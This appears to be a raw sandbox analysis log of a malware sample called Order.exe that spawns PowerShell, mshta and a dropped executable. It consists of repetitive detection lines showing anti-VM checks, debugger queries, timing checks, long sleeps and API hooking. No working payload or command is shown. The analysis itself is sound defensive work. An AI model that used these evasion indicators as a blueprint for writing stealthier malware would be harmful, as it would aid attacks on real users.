                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: Order.exe PID: 6468, type: MEMORYSTR
                  Switches to a custom stack to bypass stack traces
                  Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                  Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                  Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                  Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                  Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                  Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                  Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                  Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                  Source: C:\Users\user\Desktop\Order.exeMemory allocated: C10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeMemory allocated: 2A30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeMemory allocated: 2750000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeMemory allocated: 9180000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeMemory allocated: 78A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeMemory allocated: A180000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeMemory allocated: B180000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0041AA8F rdtsc 5_2_0041AA8F
                  Source: C:\Users\user\Desktop\Order.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4729Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 367Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeWindow / User API: threadDelayed 2523Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeWindow / User API: threadDelayed 7450Jump to behavior
                  Source: C:\Users\user\Desktop\Order.exeAPI coverage: 0.7 %
                  Source: C:\Windows\SysWOW64\mshta.exeAPI coverage: 2.6 %
                  Source: C:\Users\user\Desktop\Order.exe TID: 6528Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3128Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2500Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exe TID: 2828Thread sleep count: 2523 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exe TID: 2828Thread sleep time: -5046000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exe TID: 2828Thread sleep count: 7450 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exe TID: 2828Thread sleep time: -14900000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe TID: 6988Thread sleep time: -80000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe TID: 6988Thread sleep time: -58500s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe TID: 6988Thread sleep time: -44000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\mshta.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_00B9C6D0 FindFirstFileW,FindNextFileW,FindClose,9_2_00B9C6D0
                  Source: C:\Users\user\Desktop\Order.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: firefox.exe, 0000000D.00000002.2207938320.000001CE4CD4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6
                  Source: mshta.exe, 00000009.00000002.4143600767.00000000032C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu&S
                  Source: mkvfHfXifKJWp.exe, 0000000C.00000002.4143576010.000000000051F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllss
                  Source: C:\Users\user\Desktop\Order.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0041AA8F rdtsc 5_2_0041AA8F
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_00417983 LdrLoadDll,5_2_00417983
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C019F mov eax, dword ptr fs:[00000030h]5_2_019C019F
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C019F mov eax, dword ptr fs:[00000030h]5_2_019C019F
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C019F mov eax, dword ptr fs:[00000030h]5_2_019C019F
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C019F mov eax, dword ptr fs:[00000030h]5_2_019C019F
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0193A197 mov eax, dword ptr fs:[00000030h]5_2_0193A197
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0193A197 mov eax, dword ptr fs:[00000030h]5_2_0193A197
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0193A197 mov eax, dword ptr fs:[00000030h]5_2_0193A197
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019FC188 mov eax, dword ptr fs:[00000030h]5_2_019FC188
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019FC188 mov eax, dword ptr fs:[00000030h]5_2_019FC188
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01980185 mov eax, dword ptr fs:[00000030h]5_2_01980185
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019E4180 mov eax, dword ptr fs:[00000030h]5_2_019E4180
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019E4180 mov eax, dword ptr fs:[00000030h]5_2_019E4180
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A161E5 mov eax, dword ptr fs:[00000030h]5_2_01A161E5
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019BE1D0 mov eax, dword ptr fs:[00000030h]5_2_019BE1D0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019BE1D0 mov eax, dword ptr fs:[00000030h]5_2_019BE1D0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019BE1D0 mov ecx, dword ptr fs:[00000030h]5_2_019BE1D0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019BE1D0 mov eax, dword ptr fs:[00000030h]5_2_019BE1D0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019BE1D0 mov eax, dword ptr fs:[00000030h]5_2_019BE1D0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A061C3 mov eax, dword ptr fs:[00000030h]5_2_01A061C3
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A061C3 mov eax, dword ptr fs:[00000030h]5_2_01A061C3
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019701F8 mov eax, dword ptr fs:[00000030h]5_2_019701F8
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019EA118 mov ecx, dword ptr fs:[00000030h]5_2_019EA118
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019EA118 mov eax, dword ptr fs:[00000030h]5_2_019EA118
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019EA118 mov eax, dword ptr fs:[00000030h]5_2_019EA118
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019EA118 mov eax, dword ptr fs:[00000030h]5_2_019EA118
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019EE10E mov eax, dword ptr fs:[00000030h]5_2_019EE10E
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019EE10E mov ecx, dword ptr fs:[00000030h]5_2_019EE10E
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019EE10E mov eax, dword ptr fs:[00000030h]5_2_019EE10E
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019EE10E mov eax, dword ptr fs:[00000030h]5_2_019EE10E
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019EE10E mov ecx, dword ptr fs:[00000030h]5_2_019EE10E
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019EE10E mov eax, dword ptr fs:[00000030h]5_2_019EE10E
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019EE10E mov eax, dword ptr fs:[00000030h]5_2_019EE10E
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019EE10E mov ecx, dword ptr fs:[00000030h]5_2_019EE10E
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019EE10E mov eax, dword ptr fs:[00000030h]5_2_019EE10E
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019EE10E mov ecx, dword ptr fs:[00000030h]5_2_019EE10E
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01970124 mov eax, dword ptr fs:[00000030h]5_2_01970124
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A00115 mov eax, dword ptr fs:[00000030h]5_2_01A00115
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01946154 mov eax, dword ptr fs:[00000030h]5_2_01946154
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01946154 mov eax, dword ptr fs:[00000030h]5_2_01946154
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0193C156 mov eax, dword ptr fs:[00000030h]5_2_0193C156
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019D8158 mov eax, dword ptr fs:[00000030h]5_2_019D8158
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A14164 mov eax, dword ptr fs:[00000030h]5_2_01A14164
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A14164 mov eax, dword ptr fs:[00000030h]5_2_01A14164
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019D4144 mov eax, dword ptr fs:[00000030h]5_2_019D4144
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019D4144 mov eax, dword ptr fs:[00000030h]5_2_019D4144
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019D4144 mov ecx, dword ptr fs:[00000030h]5_2_019D4144
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019D4144 mov eax, dword ptr fs:[00000030h]5_2_019D4144
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019D4144 mov eax, dword ptr fs:[00000030h]5_2_019D4144
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A060B8 mov eax, dword ptr fs:[00000030h]5_2_01A060B8
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A060B8 mov ecx, dword ptr fs:[00000030h]5_2_01A060B8
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194208A mov eax, dword ptr fs:[00000030h]5_2_0194208A
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019380A0 mov eax, dword ptr fs:[00000030h]5_2_019380A0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019D80A8 mov eax, dword ptr fs:[00000030h]5_2_019D80A8
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C20DE mov eax, dword ptr fs:[00000030h]5_2_019C20DE
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0193C0F0 mov eax, dword ptr fs:[00000030h]5_2_0193C0F0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019820F0 mov ecx, dword ptr fs:[00000030h]5_2_019820F0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0193A0E3 mov ecx, dword ptr fs:[00000030h]5_2_0193A0E3
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C60E0 mov eax, dword ptr fs:[00000030h]5_2_019C60E0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019480E9 mov eax, dword ptr fs:[00000030h]5_2_019480E9
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0195E016 mov eax, dword ptr fs:[00000030h]5_2_0195E016
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0195E016 mov eax, dword ptr fs:[00000030h]5_2_0195E016
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0195E016 mov eax, dword ptr fs:[00000030h]5_2_0195E016
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0195E016 mov eax, dword ptr fs:[00000030h]5_2_0195E016
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C4000 mov ecx, dword ptr fs:[00000030h]5_2_019C4000
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019E2000 mov eax, dword ptr fs:[00000030h]5_2_019E2000
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019E2000 mov eax, dword ptr fs:[00000030h]5_2_019E2000
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019E2000 mov eax, dword ptr fs:[00000030h]5_2_019E2000
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019E2000 mov eax, dword ptr fs:[00000030h]5_2_019E2000
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019E2000 mov eax, dword ptr fs:[00000030h]5_2_019E2000
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019E2000 mov eax, dword ptr fs:[00000030h]5_2_019E2000
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019E2000 mov eax, dword ptr fs:[00000030h]5_2_019E2000
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019E2000 mov eax, dword ptr fs:[00000030h]5_2_019E2000
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019D6030 mov eax, dword ptr fs:[00000030h]5_2_019D6030
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0193A020 mov eax, dword ptr fs:[00000030h]5_2_0193A020
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0193C020 mov eax, dword ptr fs:[00000030h]5_2_0193C020
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01942050 mov eax, dword ptr fs:[00000030h]5_2_01942050
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C6050 mov eax, dword ptr fs:[00000030h]5_2_019C6050
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0196C073 mov eax, dword ptr fs:[00000030h]5_2_0196C073
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01938397 mov eax, dword ptr fs:[00000030h]5_2_01938397
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01938397 mov eax, dword ptr fs:[00000030h]5_2_01938397
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01938397 mov eax, dword ptr fs:[00000030h]5_2_01938397
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0196438F mov eax, dword ptr fs:[00000030h]5_2_0196438F
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0196438F mov eax, dword ptr fs:[00000030h]5_2_0196438F
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0193E388 mov eax, dword ptr fs:[00000030h]5_2_0193E388
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0193E388 mov eax, dword ptr fs:[00000030h]5_2_0193E388
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0193E388 mov eax, dword ptr fs:[00000030h]5_2_0193E388
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019EE3DB mov eax, dword ptr fs:[00000030h]5_2_019EE3DB
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019EE3DB mov eax, dword ptr fs:[00000030h]5_2_019EE3DB
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019EE3DB mov ecx, dword ptr fs:[00000030h]5_2_019EE3DB
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019EE3DB mov eax, dword ptr fs:[00000030h]5_2_019EE3DB
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019E43D4 mov eax, dword ptr fs:[00000030h]5_2_019E43D4
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019E43D4 mov eax, dword ptr fs:[00000030h]5_2_019E43D4
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019FC3CD mov eax, dword ptr fs:[00000030h]5_2_019FC3CD
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194A3C0 mov eax, dword ptr fs:[00000030h]5_2_0194A3C0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194A3C0 mov eax, dword ptr fs:[00000030h]5_2_0194A3C0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194A3C0 mov eax, dword ptr fs:[00000030h]5_2_0194A3C0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194A3C0 mov eax, dword ptr fs:[00000030h]5_2_0194A3C0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194A3C0 mov eax, dword ptr fs:[00000030h]5_2_0194A3C0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194A3C0 mov eax, dword ptr fs:[00000030h]5_2_0194A3C0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019483C0 mov eax, dword ptr fs:[00000030h]5_2_019483C0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019483C0 mov eax, dword ptr fs:[00000030h]5_2_019483C0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019483C0 mov eax, dword ptr fs:[00000030h]5_2_019483C0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019483C0 mov eax, dword ptr fs:[00000030h]5_2_019483C0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C63C0 mov eax, dword ptr fs:[00000030h]5_2_019C63C0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0195E3F0 mov eax, dword ptr fs:[00000030h]5_2_0195E3F0
